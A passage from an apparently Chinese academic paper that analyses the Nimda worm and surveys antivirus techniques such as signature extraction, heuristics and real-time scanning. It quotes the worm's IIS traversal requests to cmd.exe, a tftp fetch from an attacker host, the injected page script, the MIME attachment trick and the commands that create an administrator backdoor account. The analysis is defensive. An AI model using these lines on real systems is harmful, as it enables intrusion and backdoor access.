 (4)不随意查看陌生邮件，尤其是带有附件的邮件，，由于有的病毒邮件能够利用ie和outlook的漏洞自动执行，所以计算机用户需要升级ie和outlook程序，及常用的其他应用程序！[6]
2.2.5小结
 网络蠕虫病毒作为一种互联网高速发展下的一种新型病毒，必将对网络产生巨大的危险。在防御上，已经不再是由单独的杀毒厂商所能够解决，而需要网络安全公司，系统厂商，防病毒厂商及用户共同参与，构筑全方位的防范体系！
 蠕虫和黑客技术的结合，使得对蠕虫的分析，检测和防范具有一定的难度，同时对蠕虫的网络传播性，网络流量特性建立数学模型也是有待研究的工作！
2.3经典蠕虫病毒尼姆达（Nimda）解析
2.3.1蠕虫病毒尼姆达（Nimda）档案
 名称：Nimda/尼姆达
 一些反病毒厂商的命名：
Worm.Concept.57344
W32/Nimda.A@mm
W32/Nimda@mm
I-Worm.Nimda
 类型：蠕虫/病毒
 受影响系统有：
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows ME
Microsoft Windows NT 4.0
Microsoft Windows 2000
Microsoft Windows XP
    大小：57344字节
 病毒概述：
 一种新型的恶意蠕虫"Nimda"（又称"概念病毒(CV) v.5"）正在广泛传播。它影响所有未安装补丁的Windows系统，破坏力极大。
 Nimda是“概念”蠕虫
 1．它可以通过至少五种方式传播
 2．它是一个带exe扩展名的dll，可以做为可执行文件运行，也可作为dll运行。
 3．它有智慧：当它名为Admin.dll被运行时，它会把自己复制到windows文件夹命名为mmc.exe并带上参数"-qusery9bnow"运行。
 4．当它名为readme.exe被运行时，它会把自己复制到%temp%带上参数"-dontrunold"运行.
 5．它会把自己的属性设为“系统”“隐藏”，再改写注册表，使“系统”“隐藏”属性的程序在资源管理器中不可见。
 6．它是一个主机扫描器，一个弱点扫描器，一个后门程序；带有多个Exploit，掌握最新的安全信息；它就是一个黑客。
 以下都是蠕虫文件的可执行程序，它们之间的区别只有文件名不同而已：
 1．[mmc.exe]
 出现在windows文件夹，蠕虫扫描和创建tftpd的进程就是它。注意windows系统文件夹里也有一个mmc.exe，那不是Nimda。
 2．[riched20.dll]
 riched20.dll除了出现在Windows系统文件夹里，还可能出现在任何有*.doc文件的文件夹里。
 因为它是winword.exe和wordpad.exe运行时都要调用的所以当打开DOC文件时就等于运行了Nimda。
 3．[Admin.dll]
 （Admin.dll除了在C:，D:，E:的根目录外还可出现在下面的"TFTP*****"出现的地方）
 4．[load.exe]
 出现在windows系统文件夹
 5．[%temp%\readme*.exe]
 6．[TFTP****]
 形如TFTP3233。文件位置取决于使用tftp的目录。
 如果是"GET /scripts/root.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"那么位置就在"Inetpub\scripts\"。
 如果是"GET/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"
 那么位置就在"/scripts/..%c1%1c../"也就是根目录。
 7．[readme.eml]
 这个东西是值得一提的，他利用了IE5（或者说OE5）的一个漏洞。我们知道html格式的邮件中图片和多媒体文件都是自动打开的，而可执行文件不是。但如果把可执行文件指定为多媒体类型，也会自动下载打开。下面是readme.eml的一段：
 --====_ABC1234567890DEF_====
 Content-Type: audio/x-wav;
 name="readme.exe"
 Content-Transfer-Encoding: base64
 Content-ID: <EA4DMGBP9p>
 另外，如果文件夹是“按web页查看”，那么即使只是用鼠标单击选中readme.eml也会导致蠕虫的执行，如果把扩展名改为mht也是可以的，但改为htm就不行。
 8．[readme.nws]
 同readme.eml，只是出现的几率很小。
 9．[*.exe]
 可执行文件被感染，所以可能是任何文件名。
 该蠕虫使用多种途径进行传播途径有：
（1）通过email邮件传播
（2）通过网络共享传播
（3）通过主动扫描并攻击未打补丁的IIS服务器传播
（4）通过浏览被篡改网页传播
这个蠕虫的传播利用了如下四个安全漏洞：
（1）微软IE异常处理MIME头漏洞
IE在处理MIME头中"Content-Type:"处指定的某些类型时，存在问题，攻击者可以利用这类缺陷在IE客户端执行任意命令。
（2）Microsoft IIS Unicode解码目录遍历漏洞（中联绿盟安全公告(SA2000-06)）
微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。
（3）Microsoft IIS CGI文件名错误解码漏洞（中联绿盟安全公告(SA2001-02)）
微软IIS 4.0/5.0在处理CGI程序文件名时存在一个安全漏洞，由于错误地对文件名进行了两次解码，攻击者可能利用这个漏洞执行任意系统命令。
（4）"CodeRedII"和Sadmind/IIS蠕虫留下的后门程序。
2.3.2蠕虫特征
（1）邮件传播时的特征：
－ 邮件信息的主题行文本内容不定。
－ 邮件正文显示未空。
－ 包含一个名为"readme.exe"的base64编码的可执行附件。
－ 附件大小为57344字节。
（2）被感染系统特征：
－ 在C:\、D:\、E:\系统盘下以及其他目录下有很多Admin.dll文件。
－ 存在大量的readme.eml或者readme.nws文件。
－ 存在大量的riched20.dll文件。
－ \Windows\System目录下有load.exe文件。
－ 在Windows临时目录下存在很多名?quot;MEP*.TMP.EXE"的文件。
－ C盘被设为共享，共享名为C$。
－ guest用户被激活并被加到管理员组。
注：上述文件大都被设置了隐藏、系统属性，您需要在资源管理器中设置"查看所有类型"文件才可以看到。
（3）被攻击的IIS服务器的日志记录中有如下字符串：
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
注：这并不意味着这个系统已经被感染，只是表明曾经遭受过攻击。[7]
（4）从受感染主机会往外部地址TCP 80端口发起大量连接。
2.3.3蠕虫危害
－ 产生大量的垃圾邮件。
－ 用蠕虫副本替换系统文件,可能影响word,frontpage等软件的正常工作。
－ 严重降低系统以及网络性能。
－ 创建开放共享，大大降低了系统的安全性。
－ 将Guest帐号赋予管理员权限，降低了系统的安全性。
2.3.4蠕虫行为分析
 这个蠕虫的行为可以分为三个部分：传播、系统感染、安装后门。
2.3.4.1传播过程：
1．Email传播
 蠕虫会向被攻击者的邮件地址发送一封携带了蠕虫附件的邮件。这个邮件由两部分MIME类型的信息组成。第一部分的MIME类型为"text/html"，但却没有包含文本，因此看起来是空的。第二部分的MIME类型为"audio/x-wav"，但它实际上携带的是一个名为"readme.exe"的base64编码的可执行附件。
 并且使用微软IE 5.5 SP1或之前版本（IE 5.01 SP2除外）来显示HTML邮件的邮件客户端软件，都将自动执行邮件附件。用户甚至只需打开或预览邮件即可使蠕虫被执行。
被蠕虫攻击的目标邮件地址从下列两个来源中获得：
（1）用户web cache文件夹中的.htm和.html文件
（2）用户通过MAPI服务收到的email邮件的内容
蠕虫在这些文件中搜索看起来象邮件地址的字符串，然后向这些地址发送一份包含蠕虫拷贝的邮件。Nimda蠕虫在Windows注册表中记录最后一批邮件发送的时间，然后每10天重复搜索邮件地址并发送蠕虫邮件的过程。
   IIS Web服务器传播。蠕虫会利用两个IIS服务器的目录遍历漏洞和以前的一些IIS蠕虫(CodeRedII和Sadmind/IIS)留下的后门程序来进行传播。
蠕虫按照下列几率来选择攻击目标的IP地址：
 50%的几率，在与本地IP地址前2字节相同的地址(B类网络)中选择一个。
 25%的几率，在与本地IP地址前1字节相同的地址(A类网络)中选择一个。
 25%的几率，随机选择IP地址。
 蠕虫会首先在启动一个tftp服务器，监听在udp/69端口。一旦发现受影响的主机，蠕虫会通过执行类似下列命令来向其发送蠕虫代码：
"GET /scripts/root.exe?/c+tftp -i attackerIP GET Admin.dll HTTP/1.0"
attackerIP就是正在发起攻击的蠕虫所在的主机IP。这样被攻击的主机上就产生了一个蠕虫的拷贝，命名为admin.dll。然后蠕虫会发送类似如下请求来执行蠕虫拷贝："GET /scripts/Admin.dll HTTP/1.0"
 对于IIS 5.0，这也利用了另外一个IIS安全漏洞"Microsoft IIS 5.0 系统文件列表权限提升漏洞"。如果任何可执行文件的名字与IIS系统文件名列表中的文件匹配，则当它通过IIS被执行时就会在IIS 进程空间中运行，也就是以SYSTEM权限执行。admin.dll就是Frontapage扩展中所带的一个动态链接库，它刚好在IIS系统文件列表中。
 在执行完TFTP命令之后，当前目录下会产生一些临时文件，例如TFTP68等等，它们也是蠕虫拷贝。Admin.dll被运行时，它会把自己复制到\windows文件夹命名为Load.exe,然后带上参数"-qusery9bnow"运行。蠕虫会在整个硬盘中搜索后缀为：".HTML"、".ASP"、".HTM"，文件名为："DEFAULT"、"INDEX"、"MAIN"、"README"的文件。一旦发现了这样的文件，蠕虫会在该目录下创建一个README.EML文件，它是一个由两部分组成的MIME编码的文件，里面也包含了蠕虫拷贝。然后蠕虫会在找到的文件的末尾增加如下JvaScript代码：
<script language="java script">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>
 这样，其他用户如果使用浏览器浏览被修改的网页或者资源管理（打开了预览功能）来浏览共享服务器上的README.EML文件时，利用IE浏览器"异常处理MIME头漏洞",蠕虫就可以传播到新的客户端上。
2．文件共享传播
 蠕虫访问共享网络资源，然后开始检测远程系统上的文件。如果发现一个.EXE文件，它将蠕虫代码加到原来文件的前面。下次执行被感染文件时将首先执行蠕虫代码。它并不感染'Winzip32.exe'。如果发现.DOC文件，它将自己拷贝到DOC文件所在目录下，改名为RICHED32.DLL，并设置隐藏、系统权限。由于Windows Word在打开该DOC文件时，会首先在当前目录寻找RICHED32.DLL，这将首先运行蠕虫代码。这也会大大增大远程用户的感染几率。它也会利用找到的论文文件的名字创建以.EML和.NWS后缀的文件，这些文件也是带有蠕虫拷贝的MIME编码的文件。
2.3.4.2系统感染过程
 蠕虫会检查注册表中的如下表项：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
然后感染所有找到的程序。蠕虫会将自身拷贝到\Windows\System目录中，命名为load.exe.并修改SYSTEM.INI文件，将Shell部分改为如下内容：
Shell = explorer.exe load.exe -dontrunold
这样每次系统重启后都会运行蠕虫拷贝。它会用自身拷贝替换Windows目录下的Riched20.dll.这样下次执行word时会自动执行这个蠕虫。如果蠕虫是以README.EXE文件名被执行，它会将自身拷贝到windows临时目录中，并使用随机文件名，例如'MEP*.TMP.EXE'。蠕虫在第一次执行时会寻找"EXPLORER"进程，将自己的进程注册为"Explorer"的一个远程线程。这样即使用户退出系统，蠕虫仍然可以继续执行。
2.3.4.3安装后门
 Nimda蠕虫会修改一些注册表项以降低系统安全性，同时也安装了后门。
蠕虫会将所有驱动器设置成共享状态，它会编辑如下注册表项：
HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\[C$ -> Z$]
蠕虫会删除下列注册表项的所有子键以禁止共享安全性：
HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
蠕虫会修改下列注册表项：
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
调整 'Hidden', 'ShowSuperHidden'和 'HideFileExt' 键值，使得使用资源管理器无法显示隐藏文件。这可以保护蠕虫代码被发现。通过执行下列命令，蠕虫还激活了guest用户，将其密码设置为空，并将其加入到Administrators组中(对于Windows NT/2000/XP用户)：
net user guest /add
net user guest /active
net user guest ""
net localgroup Administrators guest
net localgroup Guests guest /add
通过执行下列命令，蠕虫将C:\设置为完全共享：
net share c$=c:\

3.尼姆达（Nimda）蠕虫病毒的查杀
3.1前言
 关于病毒，经历过计算机病毒多次侵害的人们，想必已经非常熟悉了。人们也使用了许多种反病毒软件，但仍经常受到病毒的攻击，大家都没弄太清楚，到底怎么做，才能保证计算机每分每秒的安全。经历过CIH、“美丽莎”病毒的洗礼，人们已知道了“查杀病毒不可能一劳永逸”的道理，已经明白维护计算机的安全是一项漫长的过程。
3.2杀毒软件的扫描方法
    杀毒软件是对付计算机病毒的最有效方法，但是没有杀毒软件能100%的保证系统不被病毒感染。任何宣称存在这种杀毒软件的广告都是虚假的、在法律上说都是无效的。那样的系统是不存在的，因为每种杀毒算法都可能促使产生与之相对立的病毒的算法，随之制造的病毒对于这种特定的杀毒软件可能检测不到(当然：任何杀毒算法都可以开发成一个杀毒软件)。而且，已经证实“在有限理论的基础上不可能存在绝对的防毒”——试验者是Fred Cohen。
　　从杀毒技术上来讲，当前，最流行的杀毒软件都是一个扫描器，扫描的算法有多种，通常为了使杀毒软件功能更强大，会结合使用好几种扫描方法。
　　1)病毒扫描
　　病毒扫描是当前最主要的查杀病毒方式，它主要通过检查文件、扇区和系统内存、搜索新病毒，用“标记”查找已知病毒，病毒标记就是病毒常用代码的特征，病毒除了用这些标记，也用别的方法。有的根据算法来判断文件是否被某种病毒感染，一些杀毒软件也用它来检测变形病毒。
　　病毒扫描从杀毒方式上可以分成两种——“通用”和“专用”。“通用”扫描被设计成不依赖操作系统，可以查各种病毒；而“专用”扫描则被设计用来专查某种病毒，如宏病毒，可以使某些应用软件的病毒防护更加可靠。
　　病毒扫描也可按照用户操作方式分成实时扫描和请求式扫描，实时扫描能提供更好的系统病毒防护，因为如果有病毒出现，能够立即发现，请求式扫描只在运行时才能检测到病毒。
　　2)启发式扫描
　　启发式扫描是通过分析指令出现的顺序，或组合情况来决定文件是否感染，每个对象都要检查，这种方式查毒效果是最高的，但也最可能出现误报。
　　3)CRC 扫描
　　CRC扫描的原理是计算磁盘中的实际文件或系统扇区的CRC值(检验和)，这些CRC值被杀毒软件保存到它自己的数据库中，在运行杀毒软件时，用备份的CRC值与当前计算的值比较，可以知道文件是否已经修改或被病毒感染。
　　使用这种算法的CRC扫描是强有力的反病毒工具：100%的病毒都能在进入计算机时被检查出来。但这种杀毒方式天生就有一个缺点——效率很低。CRC扫描在病毒已经渗透到计算机之后，并不能很快的检测到，只有过一段时间病毒开始传播时才会发现，而且不能检测新文件中的病毒(例如邮件、软件文件、备份恢复的文件或解压文件)，因为在它的数据库中没有这些文件的CRC值。此外，有的病毒也会利用CRC扫描的这种“弱点”，只在扫描之前感染新创建的文件。
    各种扫描都有自己的优缺点，拥有一个病毒库是他们的基本特征，但是如果病毒库过大的话，查毒速度会变得很慢。除了以上的杀毒方法外，还有一些常用技术。
　　1）行为判断
　　行为判断就是通过驻留的杀毒软件截获那些对用户有病毒危险的行为，这些病毒可能会在修改可执行文件、引导扇区或MBR时被发现，这种方法的优点在于可以在病毒感染的早期发现并阻止，但有的病毒可以越过这种保护，使得杀毒软件完全失效。
　　2）病毒免疫
　　免疫有两种：一种是感染警告，另一种是阻止病毒感染。第一种免疫方式主要是预防那些把自己添加到文件末尾的病毒（通常是文件型病毒），每个文件都会检查。但有一个致命的弱点：无法检测到诡密病毒，所以实际上很少用这种免疫方式。
　　第二种免疫方式主要是预防系统被某种特定病毒感染，如果文件被病毒修改就可以检测到（例如文件中存在字符串“MsDos”，说明文件可能被“Jerusalem”病毒感染），如果病毒把一个小的TSR程序拷贝到计算机内存中，系统肯定被感染。
    由于不可能对所有的病毒采用免疫，所以这种病毒免疫方式并不通用。
　　哪种杀毒技术更好？答案是——都好，只要计算机里没有病毒。但是如果要安装新软件、收邮件、使用Word或Excel电子表，需要根据自身的情况选择几种比较合适的杀毒软件。
    各种杀毒软件的特点都会有一些不同，它们的质量我想可以肯定，下面说几点相对重要的：可靠性和方便性——杀毒软件会不会经常“挂起”，普通用户使用时是否需要特定的技术知识。
　　1） 扫描论文、检测各种病毒的性能，能不能修复被感染的文件，扫描引擎能不能及时地更新，处理新病毒的速度。
　　2） 杀毒软件是否适应各种平台（DOS、Windows、Alpha、Linux等），不仅可以根据用户需要扫描，还要有能实时监控、网络查毒的能力。
　　3） 查毒速度等其他有用功能。
杀毒软件最重要的是可靠性，虽然没有“绝对的杀毒软件”，但也不能扫描一半文件就挂了，磁盘中剩下的文件还没有扫描完，也没有检测出系统中的病毒；杀毒软件不能要求用户具备特定的知识——许多用户只愿选择杀毒软件弹出简单的[OK]或[Cancel]按钮的消息框，如果杀毒软件经常会询问用户一些复杂的问题，用户肯定不会喜欢这种杀毒软件。
显然，病毒检测能力是第二个重要因素，之所以叫杀毒软件，目的就是检测并清除病毒。 
 任何不能检测到病毒的杀毒软件都是无效的。如果一个杀毒软件不能100%防疫一种变形病毒，那整个系统将会被这种类型的病毒感染，此种杀毒软件只能检测出系统中被感染的部分（99%）文件，剩下的1%被感染文件还是没有查到，这时病毒已经感染计算机了，第二次扫描时，杀毒软件又会留下1%的文件没有扫描，但这次是上次99%中的1%，实际上是1.99%，可以想象最后将是什么样子。
　　因此病毒检测能力是衡量杀毒软件质量的第二个最重要标准；比支持多平台等其他特点都重要。
    当然杀毒软件也不能太敏感，如果经常误报，以致删除了没有感染的文件，用户也会错过真正的病毒警告。
    多平台支持也是一个重要的因素，例如"OneHalf"病毒感染Windows95或WindowsNT系统，如果你使用DOS杀毒软件来解密磁盘（这个病毒会加密磁盘扇区），结果会令你很失望：磁盘上的数据可能被毁坏，因为Windows95/NT在扇区加密后不允许杀毒软件直接读/写它的扇区，而用Windows95/NT杀毒软件就能把病毒清除。
 对于杀毒软件来说，实时监控能力也是一个相当重要的标准，如果进来的文件和磁盘中有病毒应该能100%的检查到，保证文件服务器的安全（如避免Windows NT遭受宏病毒的攻击，对所有进来的邮件进行扫描）都是必需的。如果杀毒软件在网络管理方面的功能很强，那它的价值也很大。
 另一个重要的标准是工作速度。如果全面扫描整个系统需要好几小时才能完成，大多数用户可能不会经常扫描。不同的杀毒软件用不同扫描算法，有的速度快质量好，而有的可能速度慢而且质量也没有那么高，这些要依靠软件开发者的能力。
　　附加功能作为评价杀毒软件的最后一个标准，因为没有这些功能不会影响整个软件的使用。然而，有的功能对用户来说很方便，做事情会更容易，这样会促使用户经常使用杀毒软件。
　　由于Internet的普及，互联网已经成为病毒制作技术扩散、病毒传播的重要途径，病毒开发者之间已经出现了团队合作的趋势，病毒制作技术也在与黑客技术进行融合。他们对现在的病毒对抗技术提出了挑战，因此，病毒防护技术正在发生重大的变化，概括起来说，就是病毒对抗的理论在做从作品对抗到思想对抗的转变，产品形态在从独立软件产品向操作系统的补丁转变。
 1）从作品对抗到思想对抗
　　以前，杀毒软件的理论基础是，首先要发现并确认一个病毒，然后，再进行防范，它的缺点是，对未知病毒的防范能力弱，我们没有有效的办法对付各种病毒的变形，对融合了黑客技术的病毒，不能有效防范。一般是一种新病毒发作后，大家才能开发出查杀该病毒的软件，用户还需要尽快升级自己的防毒软件，因此，可以说以前的方法就好象警察找罪犯，在警察没有看到罪犯犯罪，或得到举报前，即使罪犯犯了罪，警察也没有办法，这是一种病毒制造者与安全专家之间在作品层面的竞赛。而新的理论是基于对大量的病毒的特征、发作过程、传播变化统计的基础上，建立控制策略数学模型，采取分门别类的方法，有效解决应用同种思想开发出的各种病毒，可以极大提高对新病毒的反应时间。由于这种方法是通过抑制病毒设计思想而实现的，因此，这是一种病毒制造者与安全专家之间在整体思想层面的竞赛。
　　因此，新的杀毒软件不仅仅是依据病毒数据库中的病毒代码对计算机进行扫描，而是对计算机所运行的各种进程、各种操作进行监控，如果发现某个事件或某项操作存在典型的病毒特征，或是对计算机存在危害，那么这些事件或操作就会被阻止，得以更有效地保护计算机不受新型病毒的入侵。
　　2）从独立产品到操作系统的补丁
　　杀毒软件作为一个独立的软件产品，已经存在了很久，但是，由于病毒制造者越来越多地利用操作系统的漏洞和黑客技术，因此，与操作系统的紧密结合成为一种必然：一方面，可以帮助操作系统减少漏洞，另一方面，也可以进一步提高运行效率和软件兼容度。从商业角度上来说，安全技术可以融入各种应用系统，减少应用系统自身的安全漏洞，同时，也可以为用户提供更加个性化的安全服务。
　　科技带来了进步，也带来了计算机病毒，我们与计算机病毒所作的斗争，是一个人、一群人与另一个人、一群人智慧的斗争，因为病毒聪明而有智慧，就像制造病毒的那些人一样，他们发明了新的病毒——我们就不得不小心的对付它；他们发明了一个很高明的病毒——我们还是得更小心的对付它。我们每天坐在计算机前，象个哑巴一样不说话，面对着一个个的病毒妖怪，这样的一个病毒，我们分析需要一天，而编写防病毒算法又得一天，很像活的生物进化历程呢，不是吗？
3.3反病毒技术
 病毒在理论上是不可判定的。病毒是一段程序，不同种类的病毒，它们的代码千差万别，任何人都不可能预测明天将会出现什么新病毒。但有一点可以肯定，只要出现了一项新的计算机技术，充分利用这项新技术编制的新病毒就一定离我们不远了。而由于软件种类极其丰富，且某些正常程序也使用了类似病毒的操作甚至借鉴了某些病毒的技术。所以，虽然有些人利用病毒某些共有的操作（如驻内存，改中断）这种共性，制作了声称可查所有病毒的程序，但这种方法对病毒进行检测势必会造成较多的误报情况，不够可靠，目前都只能作为辅助的手段配合使用，无法独立推广。
　　实际上，计算机病毒学鼻祖早在80年代初期就已经提出了计算机病毒的模型，证明只要延用现行的计算机体系，计算机病毒就存在“不可判定性”。杀病毒必须先搜集到病毒样本，使其成为已知病毒，然后剖析病毒，再将病毒传染的过程准确地颠倒过来，使被感染的计算机恢复原状。因此可以看出，一方面计算机病毒是不可灭绝的，另一方面病毒也并不可怕，世界上没有杀不掉的病毒。
    病毒的最终判定准则是其复制传染性。但这个标准是不易被使用和实现的。如果病毒已经传染了，才判定它是病毒，必然会给病毒的清除带来麻烦 (正如看病确诊不能等病人咽气，而要使用病症其他的特征一样)； 而且很多病毒的传染是有条件的，不是说让它传染就传染的；即使是能够有效地控制病毒的蔓延，如何判定它是感染了一个文件(而不是一个程序对其他程序做正常的处理)也会有相当的难度 (比如多态编码病毒),而且判定另一个文件是否被感染病毒的问题，必然会陷入病毒判定的递归。
 因此，复制传染性仅仅是作为病毒区分的最终概念和标准，而不是实用的检查病毒的通常手段。那么检查病毒用什么方法呢？这就是大家所看到的形形色色的反病毒软件所实用的手法。可谓八仙过海各显其能。与复制传染性这个以概念出发的直接准则相比，实际使用的方法都是相对准则、间接方法，即相对易于实现、同时也相对不那么准确的准则和方法。下面介绍一些常用的反病毒软件技术。
3.3.1特征码技术
　　特征码技术：基于对已知病毒分析、查解的反病毒技术。目前的大多数杀病毒软件采用的方法主要是特征码查毒方案与人工解毒并行，亦即在查病毒时采用特征码查毒，在杀病毒时采用人工编制解毒代码。
　　特征码查毒方案实际上是人工查毒经验的简单表述，它再现了人工辨识病毒的一般方法，采用了“同一病毒或同类病毒的某一部分代码相同”的原理，也就是说，如果病毒及其变种、变形病毒具有同一性，则可以对这种同一性进行描述，并通过对程序体与描述结果（亦即“特征码”）进行比较来查找病毒。而并非所有病毒都可以描述其特征码，很多病毒都是难以描述甚至无法用特征码进行描述。使用特征码技术需要实现一些补充功能，例如近来的压缩包、压缩可执行文件自动查杀技术。
 客观地说，在各类病毒检查方法中，特征值方法是适用范围最宽、速度最快、最简单、最有效的方法(比如我认识你一般只要看脸听声，而不必看出生证明、血型乃至DNA 检验，如同枪毙之前的验明正身)。具体怎样提取特征使得准确率高、虚警和虚漏都比较少或可接受，就看各个反病毒研究者对病毒代码的理解、其自身水平等很多方面了，其中还要包括很多技术和技巧。最原始的特征值方法就是字符串匹配，比如大家都知道的KVn00，至多是将无条件匹配变成加几个??的有条件匹配，当然还要再结合一些其他技巧。特征提取实际上也是一种信号处理的概念与实现。理论和事实都证明字符串匹配方法对特征提取的方向性不明确，真正有用的信息遗漏得太多，而提取出来的部分又有一些不带有病毒自身的特定信息。在技术上是一个比较失败的“特征提取”方法。当然，KVn00作者的文化水平、能力和精力等情况都决定了目前的现状。
 通常选择特征码是按照以下思路。
 1. 获取一个病毒程序的长度，根据长度可以将文件分为几份，份数根据样本长度而定，可以是3-5份，也可以更多。分成几段获取特征码的方法可以很大程度上避免采用单一特征码误报病毒现象的发生，也可以避免特征码过于集中造成的误报。
 2. 每份中选取通常为16或32个字节长的特征串。在选取时，应该采取如下的原则：
 ①如果选出来的信息是通用信息，即很多文件该位置都是一样的信息，那么舍弃，调整偏移量后重新选取。
 ②如果选取出来的信息是全零的字节。那么也要调整偏移后重新选取。
 当然调整的偏移量多少可以人为事先规定，也可以自动随机调节。最后，将选取出来的几段特征码及它们的偏移量存入病毒库，标示出病毒的名称即可。为了方便选取特征码，通常根据以上的思路编写出特征码提取程序，自动提取特征码并作为病毒记录存入病毒库。
 有效的特征提取方法可以将特定的病毒信息浓缩在很短的几个字节以内。这对于目前上万种病毒的检查和确认无疑是非常重要的。但是，通常的特征值方法对于未知病毒和多态编码病毒是无效的。而且，特征码查毒方案也具有极大的局限性。特征码的描述取决于人的主观因素，从长达数千字节的病毒体中撷取十余字节的病毒特征码，需要对病毒进行跟踪、反汇编以及其它分析，如果病毒本身具有反跟踪技术和变形、解码技术，那么跟踪和反汇编以获取特征码的情况将变得极其复杂。此外，要撷取一个病毒的特征码，必然要获取该病毒的样本，再由于对特征码的描述各个不同，特征码方法在国际上很难得到广域性支持。特征码查病毒主要的技术缺陷表现在较大的误查和误报上，而杀病毒技术又导致了反病毒软件的技术迟滞。
3.3.2虚拟机技术
　　虚拟机技术：启发式探测未知病毒的反病毒技术
　　虚拟机技术的主要作用是能够运行一定规则的描述语言。由于病毒的最终判定准则是其复制传染性，而这个标准是不易被使用和实现的，如果病毒已经传染了才判定是它是病毒，定会给病毒的清除带来麻烦。
　　那么检查病毒用什么方法呢？客观地说，在各类病毒检查方法中，特征值方法是适用范围最宽、速度最快、最简单、最有效的方法。但由于其本身的缺陷问题，它只适用于已知病毒，对于未知病毒，如果能够让病毒在控制下先运行一段时间，让其自己还原，那么，问题就会相对明了。可以说，虚拟机是这种情况下的最佳选择。
　　虚拟机在反病毒软件中应用范围广，并成为目前反病毒软件的一个趋势。一个比较完整的虚拟机，不仅能够识别新的未知病毒，而且能够清除未知病毒，我们会发现这个反病毒工具不再是一个程序，而成为可以和卡斯帕罗夫抗衡的ibm深蓝超级计算机。首先，虚拟机必须提供足够的虚拟，以完成或将近完成病毒的“虚拟传染”；其次，尽管根据病毒定义而确立的“传染”标准是明确的，但是，这个标准假如能够实施，它在判定病毒的标准上仍然会有问题；第三，假如上一步能够通过，那么，我们必须检测并确认所谓“感染”的文件确实感染的就是这个病毒或其变形。
　　目前虚拟机的处理对象主要是文件型病毒。对于引导型病毒、word／excel宏病毒、木马程序在理论上都是可以通过虚拟机来处理的，但目前的实现水平仍相距甚远。就像病毒编码变形使得传统特征值方法失效一样，针对虚拟机的新病毒可以轻易使得虚拟机失效。虽然虚拟机也会在实践中不断得到发展。但是，pc的计算能力有限，反病毒软件的制造成本也有限，而病毒的发展可以说是无限的。让虚拟技术获得更加实际的功效，甚至要以此为基础来清除未知病毒，其难度相当大。
　　受病毒在理论上就是不可判定的这一根本前提的制约，事实上，无论是启发式，亦或是虚拟机，都只能是一种工程学的努力，其成功的概率永远不可达到100％。这是惟一的却又是无可奈何的缺憾。
3.3.3实时反病毒技术
 早在80年代未，就有一些单机版静态杀毒软件在国内流行。但由于新病毒层出不穷以及产品售后服务与升级等方面的原因，用户感觉到这些杀毒软件无力全面应付病毒的大举进攻。面对这种局面，当时国内就有人提出：为防治计算机病毒，可将重要的DOS引导文件和重要系统文件类似于网络无盘工作站那样固化到PC机的BIOS中， 以避免病毒对这些文件的感染。这可算是实时化反病毒概念的雏形。虽然固化操作系统的设想对防病毒来说并不可行，但没过多久各种防病毒卡就在全国各地纷纷登场了。这些防病毒卡插在系统主板上，实时监控系统的运行，对类似病毒的行为及时提出警告。这些产品一经推出，其实时性和对未知病毒的预报功能便大受被病毒弄得焦头烂额的用户的欢迎，一时间，实时防病毒概念在国内大为风行。据业内人士估计，当时全国各种防病毒卡多达百余种，远远超过了防病毒软件产品的数量。不少厂家出于各方面的考虑，还将防病毒卡的实时反病毒模式转化为DOSTSR的形式，并以应用软件的方式加以实现，同样也取得了较不错的效果。为什么防病毒卡或DOSTSR实时防病毒软件能够风行一时？从表面上来看，是因为当时静态杀毒技术发展还不够快，而且售后服务与升级一时半会也都跟不上用户的需要，从而为防病毒卡提供了一个发展的契机。但究其最根本的原因，还是因为以防病毒卡为代表的产品技术，较好地体现了实时化反病毒的思想。如果单纯从应用角度考虑，用户对病毒存在情况是一无所知的。用户判断是否被病毒感染，唯一可行的办法就是用反病毒产品对系统或数据进行检查，而用户又不能做到每时每刻都主动使用这种办法进行反病毒检查。用户渴望的是不需要他们干预就能够自动完成反病毒过程的技术，而实时反病毒思想正好满足了用户的这种需求。这就是防病毒卡或DOSTSR防病毒软件当时能够大受用户欢迎的根本原因。实时反病毒技术一向为反病毒界所看好，被认为是比较彻底的反病毒解决方案。多年来其发展之所以受到制约，一方面是因为它需要占用一部分系统资源而降低系统性能，使用户感到不堪忍受；另一方面是因为它与其他软件（特别是操作系统）的兼容性问题始终没有得到很好的解决。
 近两年来，随着硬件处理速度的不断提高，实时化反病毒技术所造成的系统负荷已经降低到了可被我们忽略的程度，而Windows95/98和NT等多任务、多线程操作系统，又为实时反病毒技术提供了良好的运行环境。所以从1998年底开始，实时反病毒技术又重整旗鼓，卷土重来。表面看来这也许是某些反病毒产品争取市场的重要举措，但通过深入分析不难看出：重提实时反病毒技术是信息技术发展的必然结果。
